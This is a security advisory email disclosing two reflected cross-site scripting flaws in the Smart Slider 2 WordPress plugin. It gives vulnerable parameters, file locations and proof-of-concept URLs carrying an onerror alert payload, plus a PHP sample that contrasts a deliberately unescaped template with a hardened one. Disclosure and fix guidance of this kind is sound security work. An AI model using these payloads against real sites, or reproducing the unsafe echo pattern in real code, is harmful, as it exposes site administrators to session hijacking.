Subject: Cross-Site Scripting (XSS) in Smart Slider 2 2.3.11
Date: Wed, 26 Aug 2015 13:12:08 +0200

Hello,

Plugin: Smart Slider 2 2.3.11 https://wordpress.org/plugins/smart-slider-2/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code; there is no CSRF protection on the request.

Method: GET/POST
Url: http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_generator&action=generatorsettings&sliderid=-1&group=1&type=[xss]
Vulnerable parameters: type, gotopreset

Example PHP callstack:
/smart-slider-2/library/smartslider/admin/views/sliders_generator/tpl/settings.php:48

Verification:
http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_generator&action=generatorsettings&sliderid=-1&group=1&type=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_generator&action=generatorsettings&sliderid=-1&gotopreset=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

2. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code; there is no CSRF protection on the request.

Method: GET/POST
Url: http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_slider&action=changedynamiclayout&type=quick&fontset=1&sliderid=-1&layout=[xss]
Vulnerable parameters: layout, type

Example PHP callstack:
/smart-slider-2/library/smartslider/admin/views/sliders_slider/tpl/changedynamiclayout.php:122

Verification:
http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_slider&action=changedynamiclayout&type=quick&fontset=1&sliderid=-1&layout=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_slider&action=changedynamiclayout&type=quick&fontset=1&sliderid=-1&type=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
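Both findings above have the same shape: an admin template echoes a request parameter (type, gotopreset, layout) into the page without output escaping, and the view is reachable without a nonce. The PHP below is an added illustration of that pattern and of the hardened form, not code from Smart Slider 2 or its author. The function names prefixed example_ are hypothetical, and the block assumes it runs inside wp-admin so that the WordPress core functions esc_attr, esc_html, sanitize_key, wp_unslash, check_admin_referer, current_user_can, wp_die, admin_url and wp_nonce_url are available.

```php
<?php
/*
 * Added illustration (not Smart Slider 2's code): the reflected XSS pattern
 * reported above, and a hardened version of the same template.
 * Assumes WordPress is loaded; all example_* names are hypothetical.
 */

// BEFORE: the request parameter is written straight into markup.
// A value like  "><img src=x onerror=alert(1) />  (the verification payload
// above) closes the quoted attribute and injects a new element.
function example_render_settings_unsafe() {
    $type = isset( $_GET['type'] ) ? $_GET['type'] : '';
    echo '<input type="hidden" name="type" value="' . $type . '" />';
    echo '<h3>Generator: ' . $type . '</h3>';
}

// AFTER: verify a nonce, require the capability, constrain the input, and
// escape the output for the context it lands in.
function example_render_settings_safe() {
    // 1. Anti-CSRF: check_admin_referer() stops the request (wp_die) if the
    //    nonce for this action is missing or invalid, so a third-party page
    //    can no longer drive a logged-in admin to this view.
    check_admin_referer( 'example_generator_settings' );

    // 2. Authorisation: the view is meant for administrators only.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // 3. Input: read the raw value once, remove WP's added slashes, and
    //    constrain it to the expected form (here a slug-like identifier;
    //    sanitize_key() keeps only lowercase a-z, 0-9, '_' and '-').
    $type = isset( $_GET['type'] ) ? sanitize_key( wp_unslash( $_GET['type'] ) ) : '';

    // 4. Output: escape per context. esc_attr() inside a quoted attribute,
    //    esc_html() in element content. Escaping is what closes the hole;
    //    the sanitising in step 3 is defence in depth, not a substitute.
    echo '<input type="hidden" name="type" value="' . esc_attr( $type ) . '" />';
    echo '<h3>Generator: ' . esc_html( $type ) . '</h3>';
}

// Links that open the view must carry the nonce so legitimate navigation
// from the plugin's own admin pages keeps working after the check is added.
function example_settings_link( $slider_id ) {
    $url = admin_url( 'admin.php?page=example-plugin&view=generator&sliderid=' . (int) $slider_id );
    return wp_nonce_url( $url, 'example_generator_settings' );
}
```

The same two changes (nonce check on the action, esc_attr/esc_html at every echo of layout and type) apply to the second finding in changedynamiclayout.php; the context rule is what matters, since a value escaped with esc_html() is still unsafe inside an attribute, and neither is safe inside an inline script block.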

--
Regards,
Marcin Probola,